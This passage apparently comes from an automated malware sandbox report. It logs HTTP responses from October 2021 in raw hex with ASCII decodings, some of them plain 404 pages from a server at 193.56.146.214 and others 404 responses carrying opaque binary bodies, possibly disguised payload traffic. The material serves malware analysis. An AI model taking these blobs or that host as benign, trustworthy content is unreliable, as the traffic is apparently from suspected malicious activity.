0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 c5 52 ce 4f 13 79 82 ae 9c f7 ad 4e 3d 79 ac f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 10 d3 fb 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 02 ed fd 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 44 40 40 07 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 40 22 b5 1b 6f d3 cb 29 32 86 e5 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 5b 62 90 58 3f ae 03 5f a0 1f e4 a6 bd 12 9f 10 ff d9 b0 99 b5 9b 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 97 b2 ec a2 94 4a a9 b4 bb d1 46 bb 2a d2 be 45 1f d0 b5 aa 7a 8f 0e 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 b3 88 7d 3f dc e5 7e 3f a4 70 d4 03 bb 03 9a 76 6a 0f ca 82 c3 26 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 b2 27 70 10 7b 3a 1d f8 08 85 af 88 c1 a4 0e 31 25 4d db a9 c3 f8 cb 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 13:31:12 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 13:31:12 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=97Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 34 30 30 36 61 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 7d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 60 d5 d3 ef 53 47 4d c5 9c a2 ae 7a b7 be 4f 41 dd 46 29 0a f9 36 87 18 bc 67 b1 2e 7c af 3a 05 14 a5 5d ef 3b f3 56 72 bc 3d 1a 04 b2 50 2a 87 d6 17 8f 3a fa 04 b1 07 a0 e2 19 17 80 2f ba 8e 42 0d 0a 7e 82 cf 27 11 d8 9d 1d b3 9c 88 8a 38 22 7a 6d 2e e6 2a 7e d7 3f dc 9e 2e cb 81 a8 4b 55 09 d4 c1 1e 2b 50 6b bd 8e c3 58 87 c6 41 c9 b0 26 1c 94 c0 99 7d 5a 99 2b 99 5b af 18 9f 7a 95 5f 97 a6 75 3e 1a 20 8c a3 b0 ca 79 f7 ad f5 31 61 a4 cf 37 1f 1a eb 3f ae c6 74 31 8c 8f f5 03 96 0b cd 96 df a5 61 6c fd 71 12 70 df ce 22 db 30 d5 a9 b6 2a 08 8f 01 e9 46 76 22 e1 ff b8 5c 3f 1f 83 d0 30 38 ba 60 bd 49 22 09 69 53 40 98 e3 94 54 e0 2f 60 43 8c 67 f0 86 f0 fb 34 6c 1b 45 6e d5 f6 4e 76 8c 9e cd 37 14 39 7e a2 55 6b 5f c7 ae 4a 88 54 d9 60 49 d3 03 e7 fe 88 2c 3b 4c f9 10 e5 ec 9a db 25 2f 45 75 04 c5 e3 a1 b7 d9 17 81 5d 26 db 3a 35 9d f7 d5 49 4f 44 e8 d0 32 79 2e 0a ba e8 33 ec fd 05 89 52 de 0e 63 bb d6 d4 46 d1 f2 38 df d5 bf 2b 02 87 d2 db 53 3d a0 c3 96 cb 7d 64 57 b4 85 5b ae 39 16 1b e2 99 15 f7 bb 2e 44 31 e2 08 5a 11 dc 40 b4 06 91 b1 41 6b 05 23 9f f5 4a b0 6e 78 0d 2a f7 d8 d2 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 b2 d6 ea ec 5b ab 10 a3 0b ab c1 39 e2 a7 66 94 c6 a6 d3 30 68 1e 11 b2 18 4c c1 58 40 f6 e7 2a 33 72 08 ac 78 ae 53 ff 0f 71 5f 75 56 4f 82 56 c3 e9 37 7f a3 29 ff f1 ee 21 bd b4 4f 07 bb 75 4b 99 01 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 93 03 e8 a9 1c 5e 68 fc b5 2c f4 47 1c 3f 4d 93 1e 60 70 06 72 52 89 52 93 3e 09 6e c1 ca 39 52 3e cc 35 5f d8 89 98 4c 97 49 94 56 ef 01 37 e2 41 44 f0 8b 65 48 8a 76 e1 41 84 8e 71 b4 0d 16 5e ea 87 04 82 cd 7d 42 fd bd 38 ad 2a 2c 3f 86 9c aa ca b7 04 d6 62 da f5 e1 c8 09 f8 66 f4 23 a4 3b ca b5 a0 83 56 84 86 76 4e 38 13 f9 77 46 05 19 a7 ae 19 17 b0 68 d3 a1 24 4f 38 6a 19 e7 66 f5 1d 33 c7 2a 09 c5 ed fc c4 23 ef 28 ef 3e 1c 2b 48 06 30 c8 0b 4c 27 c7 7d e6 c2 6a fd 20 23 71 de a1 9f 39 b0 fc f8 06 04 cd 0b dd 30 d5 71 cf d6 a3 96 5c 41 be c0 52 50 0f fb 75 d2 7a b6 d7 5b d4 77 ed f6 4b a5 53 52 d2 c7 d4 d1 79 5e 67 ad 6d 15 b0 c0 db 31 a0 29 77 39 ac b2 03 07 1e 17 76 38 bc db 58 67 4b 5b 67 e2 3f d3 78 d9 f8 1f ba a2 50 11 3b ec 5f e0 3c 47 4b d4 50 b0 20 e1 1e 34 ee d3 2e ac 9c d8 f7 0d c0 23 af 38 15 06 1f 84 48 7f 4f 6d 5b df 92 a0 cf 0b 80 51 a9 cd 6d e1 7c 1c 9d 89 05 4d 99 2e 94 58 13 86 89 b0 6e 2c dc c3 75 44 f4 8b 85 52 aa a2 e4 2f a9 e7 5b 9a 1e bd 79
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:12 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 11 fc 86 d5 36 8c f6 c7 35 f3 73 07 03 d2 ff f9 fa fa eb b2 b9 71 cd 79 33 33 d1 60 73 45 7c 1f 57 44 63 84 be 3c 50 15 51 fe 08 a2 b9 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed c5 70 b1 17 20 58 4a ed 08 63 3e 17 21 6b df a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff e4 e1 55 db 8b 0d 13 13 bf 9e e1 92 08 0c 4f c5 03 a1 cb a1 61 7e de f5 69 e1 19 17 c6 4c af 9a a5 e4 c9 a0 cd b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 a3 77 2a b9 72 ce cc 23 b2 3b 0e 31 79 90 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 43 4f 55 b7 69 b7 9f 1f cd cc 46 d9 c8 15 ac af ed d9 55 3d ff ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac 44 06 f6 27 2c 18 f8 c7 9b 88 e7 3d 66 f1 2a 64 b1 1d 32 12 51 8c 26 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 17 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e f6 11 11 ee c3 ce 57 a3 04 1d 85 1f d6 5c 6d 91 cc 62 06 f1 60 7f ae 03 58 e5 1d e4 a4 7d 10 99 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 80 8a 49 37 03 80 e3 1c cd 20 f5 52 b7 3b 3a 96 f5 cb e7 17 3f dc e5 7e 0d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 98 3a 1d f8 4e b5 14 86 c1 70 a8 fe 04 c5 db ad 0e c9 9c 47 a2 91 29 98 f9 4c 79 de 79 d5 57 d0 6f fd ef 76 67 a8 db e9 d5 6a e2 3c 99 a8 84 be 57 a7 eb 6c 28 8e 94 16 a3 4e d4 e7 23 b2 52 dc 1a 9e 8b 18 07 64 01 7d 46 02 82 96 c6 ce 2d b2 9d df 3c 42 56 60 de 9e 93 0f 94 45 a9 24 4f 78 60 22 30 5f d6 a0 b8 78 fe b1 8e 98 37 20 5e 32 d0 c9 f3 32 42 82 39 16 12 47 0b f9 17 30 8d e3 51 22 b2 3d df 10 54 5a 17 1c 5c 5a 12 b3 19 5f 11 8f 69 f9 e4 b9 2a 01 6e f3 fd 58 b3 dc 95 25 1f 90 13 f7 5e 15 23 b5 01 92 e3 92 c2 01 7d 7e d3 95 bc 43 cf 76 62 93 55 e1 05 85 d4 9c 97 2e 60 10 3a 93 83 ac e5 fe 99 ae 32 c8 6e 95 8d 4a d5 f8 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 fb 37 67 d2 1f ad af a2 e2 54 24 d0 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 13:31:13 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 13:31:13 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=95Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 37 63 63 30 32 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 7d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 60 d5 d3 ef 53 47 4d c5 7c a2 52 90 b7 be 4f 41 dd 46 29 0a f9 36 87 18 bc 67 b1 2e 7c f9 3e 05 14 73 5e ef 3b f3 56 72 70 6e 1e 04 b2 50 2a 87 d6 37 83 3a fa 04 b1 07 a0 e2 19 17 80 2f ba 8e 42 0d 0a 7e 82 cf 27 11 da 9d 1d b3 9c 88 8a 38 22 7a 61 2e e6 2a 7e d7 46 ad 96 2e cb 81 88 4b 55 09 d4 c1 1e 2b 50 6b bd 8e c3 58 87 c6 41 c9 b0 26 1c 94 c0 99 7d 5a 99 2b 99 5b af 18 9f 7a bd 0c 93 a6 69 3e 1a 20 8c 63 bb ca c9 ba ad f5 31 61 a4 cf 37 1f 1a eb 3f 82 c2 74 e1 81 8f f5 03 96 07 cd 96 df a5 61 6c fd 71 12 70 df ce 22 db 30 d5 a9 b6 2a 08 8f 01 e9 46 76 22 e1 ff b8 5c 3f 1f 83 d0 30 38 ba 60 bd 49 22 09 69 53 40 98 e3 94 54 e0 2f 60 43 8c 67 f0 86 f0 fb 34 6c 1b 45 6e d5 f6 4e 76 8c 9e cd 37 14 39 7e a2 55 6b 5f c7 ae 4a 88 54 d9 60 49 d3 03 e7 fe 88 2c c7 1f fd 10 e5 ec 9a db 25 79 41 75 04 c5 e3 a1 b7 d9 17 81 5d 26 db 3a 35 9d f7 d5 49 4f 44 e8 d0 32 79 2e 0a ba e8 33 5c b0 05 89 52 1e 05 63 bb 9a d4 46 d1 a0 3c df d5 bf 2b 02 87 d2 db 53 3d a0 c3 96 cb 7d 64 57 b4 85 5b ae 39 16 1b e2 99 15 f7 bb 2e 44 3d e2 08 5a 11 dc 40 9e 02 91 b1 41 6b 05 23 9f f5 4a b0 6e 78 0d 2a f7 d8 d2 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 b2 d6 ea ec 0f f8 14 a3 0b ab c1 39 e2 a7 66 94 c6 a6 d3 30 18 65 17 b2 f4 a7 c1 58 40 f6 e7 2a 9d 72 08 ac 54 7b 52 ff eb 48 5a 75 56 4f 82 56 c3 e9 37 7f a3 29 ff f1 ee 21 bd b4 4f 07 bb 75 4b 99 01 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 93 03 e8 a9 51 04 f8 fc b7 2c f4 47 1b 3f 4d 93 e6 9f 70 06 c5 52 89 52 8c 3e 09 6e be ca 39 52 41 cc 35 5f 27 89 98 4c 68 48 94 56 10 02 37 e2 be 43 f0 8b 9a 47 8a 76 1e 5e 84 8e 8e 8b 0d 16 21 95 87 04 73 2d c7 4c 02 f6 30 60 f4 6b 3d 82 ae 74 99 df 92 5a 4d aa 78 71 b0 7b 66 f4 eb 40 3a aa db da 2b 5c cb e1 59 fb c4 57 cc 6f e6 65 be a9 0b 89 8b 87 2b 02 02 53 d6 5a e3 95 e6 d8 99 0a e2 4c 97 6f 09 c5 e9 fd c7 23 56 3e ec ab 1c 2b 48 06 30 c8 0b 4c c7 c7 5f c6 c9 6b ad 20 23 6b de a1 9f 3f b0 fc f8 06 04 cd 51 e5 30 d5 71 ef d6 a3 96 1c 41 be c0 52 50 1f fb 55 d2 7a b6 d5 5b d4 72 ed f6 4b a5 53 52 d2 c1 d4 d1 79 5e 67 ad 6d 11 30 c0 db 31 a2 29 77 31 ac b2 03 04 1e 57 f3 28 bc cb 58 67 5b 5b 67 c2 3f c3 78 d9 e8 1f ba e2 50 11 3b fc 5f e0 3c c7 4b d4 50 b0 20 e1 1e 3c d7 d3 2e e3 9c d8 f7 0d 82 23 af 40 16 06 1f 84 4c 7f 4f 6d 5b df 92 a0 c7 0b 80 51 a9 cd 6d e1 0c 1c 9d 89 05 4d 99 20 83 58 13 87 89 b0 6e 2c 9c c3 75 44 f4 8b 85 52 2a a2 e4 2f a9 e7 5b 9a 1e bc 79
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 40 26 0b 04 59 b9 1d 6d f5 e9 e6 a1 29 7a 3a 62 c3 cc a7 43 ec 44 d7 6b 50 78 18 e0 30 8a 3c a2 61 a3 d6 d4 22 a2 58 d5 5b 2d 22 ad 88 88 5e 6f d7 9f b7 ee bc db 32 b9 9a 4c ca 4c 08 03 d4 d2 a1 97 c6 37 13 4b 42 c4 d4 5a c6 ca 23 e8 16 41 bf 6c 13 d9 c8 9f 57 db 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 88 b6 4b 24 7e 45 f7 ff 78 8d 55 db 24 0d 11 12 b4 1f eb 92 24 82 45 c5 03 49 bd a3 61 7e de f5 69 33 11 17 7e 4f af 9a a5 e4 c3 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 11 41 48 9a 07 fd ec 23 20 77 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 d5 20 c6 4f 6b 79 82 ae 9c a7 82 4e 95 1f ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df 75 6c e5 ee 30 4c 80 f0 00 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 9a 70 f7 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 bb 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 39 07 bd 1b 6f d3 cb 29 32 a2 ed 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 13 61 6a e6 a6 dd 1a 9f 10 af d9 b0 99 89 93 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb e1 33 17 28 d2 9e c6 1d d0 eb aa 7a 8f 52 61 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 63 b9 82 7b 50 bf e5 7e 75 82 71 d4 03 6b 2c 9a 76 48 0e ca 82 21 2f 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 01 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da 